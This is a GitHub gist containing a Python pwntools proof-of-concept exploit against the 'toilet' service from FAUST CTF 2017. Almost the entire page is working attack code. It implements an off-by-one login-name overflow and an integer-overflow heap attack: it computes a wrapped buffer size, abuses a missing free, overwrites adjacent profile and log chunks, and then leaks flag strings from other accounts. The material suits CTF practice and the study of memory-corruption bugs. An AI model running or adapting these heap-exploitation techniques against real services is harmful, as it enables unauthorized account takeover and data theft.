-
-
Save waywardsun/8cf98e868d47c57acfcef51cee3c4978 to your computer and use it in GitHub Desktop.
POC exploit for toilet service of FAUST-CTF-2017
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python2 | |
# NOTE: the star import stays first so the explicit imports below take
# precedence over any same-named symbol exported by pwn.
from pwn import *
from re import findall
from random import choice, randint
from string import digits, ascii_uppercase
from hashlib import sha256
import sys
from sys import argv, exit
# Length of the "B" * MAX_NAME_LEN login name used by the off-by-one attack;
# also part of the padding computed for the integer-overflow payload.
MAX_NAME_LEN = 64

# Part of the padding computed for the integer-overflow payload. The heap
# sketches in overflow_profile label the log entry chunk as 0x70.
LOG_ELEMENT_SIZE = 0x70

# Value appended (packed with p64) to the end of the overflow payload.
# NOTE(review): the original author tags these two values "local"/"remote";
# presumably the address differs per deployment -- confirm against the binary.
#load_addr = 0x402000 # local
load_addr = 0x403000 # remote
def print_usage(argv):
    """Print the command-line help text to standard output.

    argv -- argument vector; only argv[0] (the program name) is read.
    """
    usage_lines = (
        "Usage: {} <exploit_type> <ip-address>".format(argv[0]),
        "exploit_type:",
        "\t- off-by-one: Off by one error in account creation",
        "\t- integer-overflow: Integer overflow when calculating note buffer",
    )
    for text in usage_lines:
        # Single-argument form prints the same text under Python 2 and 3.
        print(text)
class ToiletExploit():
    """Menu-driving client that tries to leak flags from the toilet service.

    Every menu helper takes an open pwntools tube ``s``, sends one menu
    choice, consumes the reply up to the next "Your choice: " prompt and
    returns ``None`` on failure or a truthy value on success.

    Two attack entry points are provided: ``off_by_one`` and
    ``integer_overflow``; both return a list of flag strings.

    NOTE(review): pwntools documents ``log.error`` as raising
    PwnlibException. If that holds, the ``sys.exit``/``return`` statements
    that follow each ``log.error`` call are only a fallback -- confirm.
    """

    def __init__(self, ip):
        """Store the target address; no connection is opened here."""
        self._ip = ip
        self._port = 5743
        # Not read anywhere in this class; kept for external users.
        self.TIMEOUT = 20
        self.NOTWORKING = 21

    # ------------------------------------------------------------------
    # Attack entry points
    # ------------------------------------------------------------------

    def off_by_one(self):
        """Run the off-by-one attack once per log entry on one connection.

        Returns the list of flags found (possibly empty).
        """
        s = self.connect()
        if s is None:
            log.error("Connection error")
            sys.exit(1)

        # Get log entries
        log.info("Dumping log")
        log_entries = self.get_log_entries(s, self.get_log(s))
        log.info("Number of log entries found: {}".format(len(log_entries)))

        overlong_name = "B" * MAX_NAME_LEN
        flags = []
        # entries go from new to old
        for log_entry in log_entries:
            # Overflow flush function
            if self.login(s, overlong_name) is None:
                log.error("Login error")
                sys.exit(1)
            if self.drop_load(s, "toomuch", log_entry) is None:
                continue

            # Change account by triggering loadProfile
            if self.flush(s) is None:
                continue
            log.success("Logged in as {}".format(log_entry))

            # Search flag
            settings = self.get_settings(s)
            if settings is None:
                continue
            leaked_name = self.get_name(settings)
            if leaked_name is None:
                continue
            flag = self.find_flag(leaked_name)
            if flag:
                flags.append(flag)

            if self.logout_store(s) is None:
                log.error("Logout error")
                sys.exit(1)

        self.exit(s)
        # Release the socket, as integer_overflow does for its connection.
        s.close()
        return flags

    def integer_overflow(self):
        """Run the integer-overflow attack, one fresh connection per entry.

        Returns the list of flags found (possibly empty).
        """
        s = self.connect()
        if s is None:
            log.error("Connection error")
            sys.exit(1)

        # Get current log entries, then drop this connection: every entry
        # is attacked over its own connection in overflow_profile.
        log_entries = self.get_log_entries(s, self.get_log(s))
        self.exit(s)
        s.close()

        flags = []
        for entry in log_entries:
            flag = self.overflow_profile(entry)
            if flag:
                flags.append(flag)
        return flags

    def overflow_profile(self, entry):
        """Attack a single log entry over a fresh connection.

        Returns the leaked flag, or None if any step fails. The connection
        is always closed, including when a step raises.
        """
        s = self.connect()
        if s is None:
            log.error("Connection error")
            return None
        try:
            return self._run_profile_overflow(s, entry)
        finally:
            s.close()

    def _run_profile_overflow(self, s, entry):
        """Perform the overflow steps on tube ``s``; the caller closes it."""
        name = self.genRandString(10)

        # Create first heap-chunk
        # | Profile(0x70) | ....
        if self.login(s, name) is None:
            log.error("Login error")
            return None

        # Create second and third heap-chunk
        # | Profile(0x70) | Drop_load(0x20) | Log_Entry(0x70) | ....
        chunk_size = self.drop_load_overflow(s, "notimportant")
        if chunk_size is None:
            log.error("Drop error")
            return None

        # Free second heap-chunk
        # | Profile(0x70) | Free(0x20) | Log_Entry(0x70) | ....
        if self.flush(s) is None:
            log.error("Flush error")
            return None

        # Use missing free in the logout function
        if self.logout_discard(s) is None:
            log.error("Logout error")
            return None

        # Create fourth heap-chunk
        # | Profile(0x70) | Free(0x20) | Log_Entry(0x70) | Profile2(0x70) |....
        if self.login(s, name) is None:
            log.error("Login error")
            return None

        # Allocate second heap-chunk and overflow Log_Entry and Profile2
        # | Profile(0x70) | Drop_Load(0x20) | Overflow -> (Log_Entry(0x70)) | (Profile2(0x70)) |....
        padding = "\x00" * (chunk_size + LOG_ELEMENT_SIZE + MAX_NAME_LEN - len(entry))
        payload = entry + padding + p64(load_addr)
        if self.drop_load_overflow(s, payload) is None:
            log.error("Drop error")
            return None
        log.info("Allocated block before Profile")

        # Switch Account to entry
        if self.flush(s) is None:
            return None
        log.success("Logged in as {}".format(entry))

        # Leak potential flag
        settings = self.get_settings(s)
        if settings is None:
            return None
        leaked_name = self.get_name(settings)
        if leaked_name is None:
            return None
        flag = self.find_flag(leaked_name)
        self.exit(s)
        return flag

    # ------------------------------------------------------------------
    # Connection and menu helpers
    # ------------------------------------------------------------------

    def genRandString(self, N):
        """Return N random characters drawn from A-Z and 0-9."""
        alphabet = ascii_uppercase + digits
        return ''.join(choice(alphabet) for _ in range(N))

    def connect(self):
        """Open a tube to the service and consume the first menu.

        Returns the tube, or None if connecting or reading the menu fails.
        """
        try:
            s = remote(self._ip, self._port)
        except Exception:
            # Connection failures are reported as None; KeyboardInterrupt
            # and SystemExit are deliberately allowed to propagate.
            return None
        if self.read_menu(s) is None:
            s.close()
            return None
        return s

    def read_menu(self, s):
        """Read up to and including the "Your choice: " prompt."""
        return s.recvuntil("Your choice: ")

    def login(self, s, name):
        """Menu option 1: log in as ``name``. Returns 1 or None."""
        s.sendline('1')
        if s.recvuntil('Please give me your name: ') is None:
            return None
        s.sendline(name)
        if self.read_menu(s) is None:
            return None
        return 1

    def change_seat_temp(self, s, temp):
        """Menu option 2: set the seat temperature. Returns 1 or None."""
        s.sendline('2')
        if s.recvuntil('Please give me the new temperature: ') is None:
            return None
        s.sendline(str(temp))
        resp = s.recvlines(2)[1]
        if self.read_menu(s) is None:
            return None
        # The spelling below is matched against the service's reply; it is
        # left exactly as the original author wrote it.
        if "Algright, let me arrange that for you." not in resp.decode('utf-8'):
            return None
        return 1

    def change_flush_func(self, s, choice):
        """Menu option 3: pick a flush function. Returns 1 or None."""
        s.sendline('3')
        if s.recvuntil('Your choice: ') is None:
            return None
        s.sendline(str(choice))
        resp = s.recvlines(2)[1]
        if self.read_menu(s) is None:
            return None
        if "Something went wrong, please try again!" in resp.decode('utf-8'):
            return None
        return 1

    def _dump_until_menu(self, s, option):
        """Send ``option`` and return everything up to the next menu header."""
        s.sendline(option)
        dump = s.recvuntil('1. Login')
        if self.read_menu(s) is None:
            return None
        return dump

    def get_settings(self, s):
        """Menu option 4: return the raw settings text, or None."""
        return self._dump_until_menu(s, '4')

    def _first_match(self, pattern, text):
        """Return the first capture of ``pattern`` in decoded ``text``, or None."""
        if text is None:
            return None
        hits = findall(pattern, text.decode('utf-8'))
        if not hits:
            return None
        return hits[0]

    def get_id(self, text):
        """Extract the value following "ID: " from raw settings text."""
        return self._first_match(r'ID: (\d*)', text)

    def get_name(self, text):
        """Extract the value following "Name: " from raw settings text."""
        return self._first_match(r'Name: ([\w+_/]*)', text)

    def get_temp(self, text):
        """Extract the value following "Seat temperature: " from settings text."""
        return self._first_match(r'Seat temperature: (\d*)', text)

    def _read_load_weight(self, s):
        """Send menu option 5 and return the announced weight digits.

        Returns the digit string captured before "g" on the line following
        'load weights ', or None when nothing matches.
        """
        s.sendline('5')
        s.recvuntil('load weights ')
        weight_line = s.recvline()
        hits = findall(r'(\d*)g', weight_line.decode('utf-8'))
        if not hits:
            return None
        return hits[0]

    def drop_load(self, s, cons, content):
        """Menu option 5: submit consistency ``cons`` and note ``content``.

        Returns the weight string announced by the service, or None.
        """
        weight = self._read_load_weight(s)
        if weight is None:
            return None
        if not s.recvuntil('the consistency:'):
            return None
        s.sendline(cons)
        if not s.recvline():
            return None
        s.sendline(content)
        if self.read_menu(s) is None:
            return None
        return weight

    def drop_load_overflow(self, s, content):
        """Menu option 5 with a consistency word computed by ``calc_cons``.

        Returns the value ``calc_chunk_size`` yields for the wrapped 16-bit
        size, or None on failure.
        """
        weight_text = self._read_load_weight(s)
        if not weight_text:
            # No digits were announced; int() would raise on them.
            return None
        weight = int(weight_text, 10)
        if not s.recvuntil('the consistency:'):
            return None
        cons, cons_word = self.calc_cons(weight)
        if cons is None:
            return None
        chunk_size = self.calc_chunk_size((weight * 100 + cons * 10) % (2 ** 16))
        # cons_word already ends with a newline, hence send() not sendline().
        s.send(cons_word)
        if not s.recvline():
            return None
        s.sendline(content)
        if self.read_menu(s) is None:
            return None
        s.clean()
        return chunk_size

    def calc_cons(self, weight):
        """Compute the consistency value and its textual encoding.

        Returns ``(cons, cons_word)`` where ``cons_word`` is a
        newline-terminated string whose character codes add up to ``cons``,
        or ``(None, None)`` when no such word of at most 30 characters
        (newline included) can be built.

        NOTE(review): that the service sums the character codes is inferred
        from the borrow step below, which preserves the sum -- confirm
        against the service binary.
        """
        max_val = 2 ** 16
        # Make sure buffer is too small for a Profile.
        # Floor division keeps cons an integer under both Python 2 and 3.
        cons = (max_val - (weight * 100) + 0x50) // 10

        remaining = cons
        cons_word = ""
        while remaining > 0x7e:
            cons_word += chr(0x7e)
            remaining -= 0x7e

        if remaining < 0x20:
            if not cons_word:
                # Nothing to borrow 0x20 from: the value cannot be encoded
                # without changing the sum.
                return None, None
            # Move 0x20 from the last '~' into the final character so that
            # the final character is at least 0x20.
            cons_word = cons_word[:-1] + chr(0x5e) + chr(remaining + 0x20)
        else:
            cons_word += chr(remaining)
        cons_word += "\n"

        if len(cons_word) > 30:
            return None, None
        return cons, cons_word

    def calc_chunk_size(self, cons):
        """Map a request size to 0x20..0x80 in 0x10 steps.

        Returns None for sizes of 0x79 and above.
        """
        upper_bounds = range(0x19, 0x7a, 0x10)
        chunk_sizes = range(0x20, 0x90, 0x10)
        for bound, size in zip(upper_bounds, chunk_sizes):
            if cons < bound:
                return size
        return None

    def show_latest_notes(self, s):
        """Menu option 6: return the notes line, or None."""
        s.sendline('6')
        header = s.recvlines(2)[1]
        if "Here are your notes:" not in header.decode('utf-8'):
            self.read_menu(s)
            return None
        notes = s.recvline()
        if not notes:
            return None
        if self.read_menu(s) is None:
            return None
        return notes

    def flush(self, s):
        """Menu option 7: flush. Returns 1 or None."""
        s.sendline('7')
        ret = s.recvuntil('1. Login')
        if ret is not None and b'Going to flush now' not in ret:
            return None
        self.read_menu(s)
        return 1

    def get_log(self, s):
        """Menu option 8: return the raw log text, or None."""
        return self._dump_until_menu(s, '8')

    def get_log_entries(self, s, log):
        """Return the ids parsed from raw log text, in the order listed.

        ``log`` may be None (a failed ``get_log``); that yields [].
        """
        if log is None:
            return []
        entries = []
        for line in log.decode('utf-8').split('\n'):
            log_id = self.get_log_id(s, line)
            if log_id:
                entries.append(log_id)
        return entries

    def get_log_id(self, s, line):
        """Return the hex id captured from one log line, or None.

        NOTE(review): the unescaped '|' makes this pattern an alternation of
        two halves rather than one full-line match; left as written because
        the service's exact log format is not visible here.
        """
        hits = findall(r'#==== ([\da-f]*) ==== | ==== [\d:]* ====#', line)
        if not hits:
            return None
        return hits[0]

    def find_log_entry(self, s, log, profile_id):
        """Return True if ``profile_id`` equals a log id with leading zeros stripped."""
        for entry in self.get_log_entries(s, log):
            if profile_id == entry.lstrip("0"):
                return True
        return False

    def logout_store(self, s):
        """Menu option 9, answering 'y'. Returns 1 or None."""
        s.sendline('9')
        s.recvline()
        s.sendline('y')
        ret = s.recvuntil('1. Login')
        if ret is None or b'Hope you feel relieved now! Come back soon!' not in ret:
            return None
        self.read_menu(s)
        return 1

    def logout_discard(self, s):
        """Menu option 9, answering 'n'. Always returns 1."""
        s.sendline('9')
        s.recvline()
        s.sendline('n')
        self.read_menu(s)
        return 1

    def exit(self, s):
        """Menu option 10; the reply is not read. Always returns 1."""
        s.sendline('10')
        return 1

    def find_flag(self, line):
        """Return the first FAUST_<32 chars> token in ``line``, or None."""
        hits = findall(r'FAUST_[A-Za-z0-9/\+]{32}', line)
        if not hits:
            return None
        return hits[0]
# Script entry: <exploit_type> <ip-address> are both required.
if len(argv) < 3:
    print_usage(argv)
    exit(1)

#context.clear(log_level='debug')
exploit = ToiletExploit(argv[2])

# Dispatch on the requested exploit type. An unknown type previously left
# `flags` unbound and crashed with NameError; now it prints usage and exits.
exploit_types = {
    "off-by-one": exploit.off_by_one,
    "integer-overflow": exploit.integer_overflow,
}
if argv[1] not in exploit_types:
    print_usage(argv)
    exit(1)
flags = exploit_types[argv[1]]()

if len(flags) > 0:
    print("Here are your flags:")
    for flag in flags:
        print(flag)
else:
    print("No flags were found!")
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment